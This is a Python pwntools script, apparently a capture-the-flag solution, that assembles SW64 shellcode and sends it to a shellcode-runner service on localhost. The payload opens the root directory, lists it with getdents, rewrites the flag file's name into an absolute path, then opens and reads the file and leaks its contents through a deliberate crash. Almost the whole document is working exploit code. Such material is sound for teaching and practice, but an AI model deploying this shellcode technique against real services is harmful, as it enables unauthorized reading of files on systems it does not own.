from pwn import *
from sw64 import *
# Trailing 4-byte instruction word appended after the final register loads;
# the payload is meant to stop here (see the "crash" step in __main__).
# Presumably the SW64 encoding of a break/trap instruction — confirm against
# the ISA reference before relying on it.
break_code = b"\x00\x00\x10\x7d"
def send_payload(p, payload):
    """Run one round of the runner's prompt/answer protocol over tube *p*.

    The peer first prompts for a length (ending in "(0 to use the builtin):"),
    then for the bytes themselves (ending in "of shellcode: "). *payload* is
    sent verbatim after its length; whatever the peer prints afterwards is
    drained with a 1 s timeout and returned as text.

    Returns the drained output decoded as UTF-8 (strict: non-UTF-8 bytes from
    the peer raise UnicodeDecodeError).
    """
    length_prompt = b"(0 to use the builtin):"
    bytes_prompt = b"of shellcode: "
    p.recvuntil(length_prompt)
    p.sendline(str(len(payload)).encode())
    p.recvuntil(bytes_prompt, timeout=1)
    p.send(payload)
    leftover = p.clean(timeout=1)
    return leftover.decode()
def attempt(payload):
    """Open a fresh connection to the service on localhost:5000 and run *payload* through it.

    The connection is closed when the block exits; the decoded response from
    send_payload is returned.
    """
    host, port = "localhost", 5000
    connection = remote(host, port)
    with connection as p:
        return send_payload(p, payload)
# Syscall numbers placed in the payload's data table and loaded into v0 before
# each syscall_0() in __main__. Presumably the target kernel's numbering for
# open / getdents / read — confirm against the target's syscall table.
syscall_no_open = 45
syscall_no_getdents = 305
syscall_no_read = 3
if __name__ == "__main__":
    # Build the shellcode as one blob: code first, then a zero-padded data
    # table starting at `data_offset`. The code reads the table back with
    # t12-relative loads (t12 appears to hold the payload's base address —
    # confirm against the sw64 helpers / the runner). Every `data_offset+0x..`
    # used below must line up with the p64() table at the end of this block.
    data_offset = 0x100
    payload = b""
    # Stage 1: open("/", 0). v0 <- syscall number, a0 <- t12 + 0x118 (the "/"
    # string sits at table slot 0x18), a1 <- 0.
    #Open /
    payload += ldq(v0, t12, data_offset) #syscall_open
    payload += ldq(a0, t12, data_offset+0x8)
    payload += add(a0, t12, a0)
    payload += mov(a1, zero_reg)
    payload += syscall_0()
    # Stage 2: getdents(fd, sp, 200) — directory entries land on the stack.
    # Dirent
    payload += mov(a0, v0) # Move fd to a0
    payload += mov(a1, sp) # Move sp to a1
    payload += ldq(a2, t12, data_offset+0x28) # load 200 into a2
    payload += ldq(v0, t12, data_offset+0x20) # load syscall_get_dents into v0
    payload += syscall_0() # getdents(2, sp, 200)
    # Offset into the dirent buffer at sp; tied to the exact entry layout the
    # runner returned, hence empirical. p64(48+17) in the data table is the
    # matching name offset used for the second open.
    offset = 48+16 # Worked out through experimentation
    # Stage 3: patch the buffer in place so the flag name becomes an absolute
    # path (0x2f == ord('/')). The arithmetic works on a whole qword, so the
    # constant also appears to adjust the neighbouring byte — values depend on
    # the observed buffer contents, verify before reuse.
    # Overwrite prepend / to flag filename
    payload += ldq(t0, sp, offset+0) # Load data one byte before flag filename into t0
    payload += ldq(t1, t12, data_offset+0x30) # Load data containing the difference into t1
    payload += add(t0, t1, t0) # Add to t0 to effectively prepend /
    payload += stq(t0, sp, offset) # Write data back to buffer
    # Stage 4: open(sp + 0x41, O_RDONLY) on the patched name.
    # Open /flag-foo-bar-baz-lorem-ipsum
    payload += ldq(t1, t12, data_offset+0x38) #Load offset inside sp into t1
    payload += add(a0, sp, t1) #Set a0 to sp+t1
    payload += mov(a1, zero_reg) #Set a1 to 0, O_RDONLY
    payload += ldq(v0, t12, data_offset) #syscall_open
    payload += syscall_0()
    # Stage 5: read(fd, sp, 200) — file contents overwrite the dirent buffer.
    #read flag
    payload += mov(a0, v0) # Move new fd into a0
    payload += mov(a1, sp) # Move sp into a1
    payload += ldq(a2, t12, data_offset+0x28) # move 200 into a2
    payload += ldq(v0, t12, data_offset+0x40) # move syscall# of read into v0
    payload += syscall_0() #syscall_read
    # Stage 6: pull the first 32 bytes at sp into t0..t3, then stop with
    # break_code so the runner's output (whatever it prints on the trap) is
    # what attempt() returns.
    # Read flag into registers and crash
    payload += ldq(t0, sp, 0)
    payload += ldq(t1, sp, 8)
    payload += ldq(t2, sp, 16)
    payload += ldq(t3, sp, 24)
    payload += break_code
    # Pad the code up to `data_offset`. NOTE(review): if the code ever grows
    # past 0x100 bytes this multiplies by a negative count and silently adds
    # nothing, shifting every table slot — keep an eye on len(payload) here.
    #data padding
    payload += b"\x00"*(data_offset-len(payload))
    # Data table; the trailing comments give each slot's offset from
    # `data_offset`, matching the ldq() displacements above.
    #data
    payload += p64(syscall_no_open)                 #0x0
    payload += p64(0x118) #string offset #0x8  (= data_offset + 0x18)
    payload += p64(0x0) #open flags #0x10
    payload += b"/"+b"\x00"*7 #0x18
    payload += p64(syscall_no_getdents)#0x20
    payload += p64(200) #0x28  (buffer length for getdents and read)
    payload += p64(0x2f00-0x0040) #0x30  (qword delta applied at sp+offset)
    payload += p64(48+17) #0x38  (name offset inside sp for the second open)
    payload += p64(syscall_no_read)#0x40
    print(attempt(payload))